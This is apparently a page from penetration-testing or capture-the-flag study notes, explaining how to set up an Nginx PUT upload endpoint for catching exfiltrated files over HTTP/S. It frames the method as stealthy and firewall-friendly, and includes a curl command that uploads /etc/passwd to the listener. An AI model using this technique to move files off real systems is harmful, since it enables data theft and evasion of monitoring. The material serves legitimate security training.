Sending Files over HTTP/S

🌐 Catching Files Over HTTP/S — Secure File Transfers with Nginx

When it comes to file exfiltration, web-based transfers (HTTP/S) are king 👑. Why?

✅ Most firewalls allow HTTP/S
✅ HTTPS encrypts content 🔒
✅ Easy to use tools like curl, wget, or Python

However, misconfigured file transfers (like plaintext uploads or public directory listings) can set off alarms 🚨. So, let’s do this the right way — secure, stealthy, and functional!

🧱 Step-by-Step: Secure Uploads with Nginx

Let’s configure a simple and secure upload endpoint using Nginx and the HTTP PUT method.

📁 1. Create Upload Directory

sudo mkdir -p /var/www/uploads/SecretUploadDirectory

This is where uploaded files will be saved.

👨‍🔧 2. Set Proper Permissions

sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

📌 www-data is the default user Nginx runs under.

📝 3. Create Nginx Config File

sudo nano /etc/nginx/sites-available/upload.conf

Paste in:

server {
    listen 9001;

    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}

💡 We’re using port 9001 to avoid port conflicts.

🔗 4. Enable the Site

sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/

🚀 5. Start (or Restart) Nginx

sudo systemctl restart nginx.service

🛠️ 6. Troubleshoot Port Conflicts (Optional)

If you get an error like:

bind() to 0.0.0.0:80 failed (98: Address already in use)

Do this:

sudo ss -lnpt | grep 80

Then remove the default config:

sudo rm /etc/nginx/sites-enabled/default
sudo systemctl restart nginx.service

✅ Done! Port conflict resolved.

📤 7. Upload a File Using `curl`

Let’s upload /etc/passwd and save it as users.txt:

curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt

✅ Success check:

sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt

🚫 8. Disable Directory Listings (Good News!)

Nginx, by default, doesn’t allow directory listings. So when you browse to:

http://localhost:9001/SecretUploadDirectory

You’ll see a 403 Forbidden or blank — and that’s exactly what we want! 🔒

🧪 Why Not Apache?

Apache makes it easier to accidentally execute uploaded scripts, especially if:

PHP is enabled (💥 .php shell = auto executed)
Directory listing is enabled

With Nginx:

It’s minimal by default ✅
You explicitly configure what you need 🛠️
Safer for stealthy operations or CTF uploads 🎯

PreviousProtected File Transfers NextUpload and Download with Built in OS Tools

Last updated 10 months ago

hashtag🌐 Catching Files Over HTTP/S — Secure File Transfers with Nginx

hashtag🧱 Step-by-Step: Secure Uploads with Nginx

hashtag📁 1. Create Upload Directory

hashtag👨‍🔧 2. Set Proper Permissions

hashtag📝 3. Create Nginx Config File

hashtag🔗 4. Enable the Site

hashtag🚀 5. Start (or Restart) Nginx

hashtag🛠️ 6. Troubleshoot Port Conflicts (Optional)

hashtag📤 7. Upload a File Using curl

hashtag🚫 8. Disable Directory Listings (Good News!)

hashtag🧪 Why Not Apache?